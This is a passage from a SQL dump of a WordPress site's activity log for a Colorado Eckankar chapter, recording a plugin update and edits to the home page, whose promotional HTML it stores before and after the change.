style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241247,41013,'post_prev_post_status','draft'),(241248,41013,'post_new_post_status','publish'),(241249,41013,'post_prev_post_date','2023-11-04 11:32:38'),(241250,41013,'post_new_post_date','2023-11-04 11:33:04'),(241251,41013,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(241252,41013,'post_new_post_date_gmt','2023-11-04 17:33:04'),(241253,41013,'_message_key','post_updated'),(241254,41013,'_user_id','2'),(241255,41013,'_user_login','S8zhaBda'),(241256,41013,'_user_email','nada@zipnadanot.org'),(241257,41013,'_server_remote_addr','76.130.120.x'),(241258,41013,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post-new.php?post_type=bg_block&wp-post-new-reload=true'),(241259,41014,'plugin_slug','fluentform'),(241260,41014,'plugin_name','Fluent Forms'),(241261,41014,'plugin_title','<a href=\"https://wpmanageninja.com/wp-fluent-form/\">Fluent Forms</a>'),(241262,41014,'plugin_description','Contact Form By Fluent Forms is the advanced Contact form plugin with drag and drop, multi column supported form builder plugin <cite>By <a href=\"https://fluentforms.com\">Contact Form - WPManageNinja LLC</a>.</cite>'),(241263,41014,'plugin_author','<a href=\"https://fluentforms.com\">Contact Form - WPManageNinja LLC</a>'),(241264,41014,'plugin_version','5.1.1'),(241265,41014,'plugin_url','https://wpmanageninja.com/wp-fluent-form/'),(241266,41014,'plugin_prev_version','5.1.0'),(241267,41014,'_message_key','plugin_bulk_updated'),(241268,41014,'_user_id','2'),(241269,41014,'_user_login','S8zhaBda'),(241270,41014,'_user_email','nada@zipnadanot.org'),(241271,41014,'_server_remote_addr','76.130.120.x'),(241272,41014,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241273,41015,'post_id','269354'),(241274,41015,'post_type','oembed_cache'),(241275,41015,'post_title',''),(241276,41015,'_message_key','post_updated'),(241277,41015,'_user_id','2'),(241278,41015,'_user_login','S8zhaBda'),(241279,41015,'_user_email','nada@zipnadanot.org'),(241280,41015,'_server_remote_addr','76.130.120.x'),(241281,41015,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241282,41016,'post_id','269352'),(241283,41016,'post_type','bg_block'),(241284,41016,'post_title','NEW HOME PAGE VIDEO Code &#8211;11/3/2023'),(241285,41016,'_message_key','post_updated'),(241286,41016,'_user_id','2'),(241287,41016,'_user_login','S8zhaBda'),(241288,41016,'_user_email','nada@zipnadanot.org'),(241289,41016,'_server_remote_addr','76.130.120.x'),(241290,41016,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269352&action=edit'),(241291,41017,'post_id','7160'),(241292,41017,'post_type','page'),(241293,41017,'post_title','Home'),(241294,41017,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241295,41017,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: 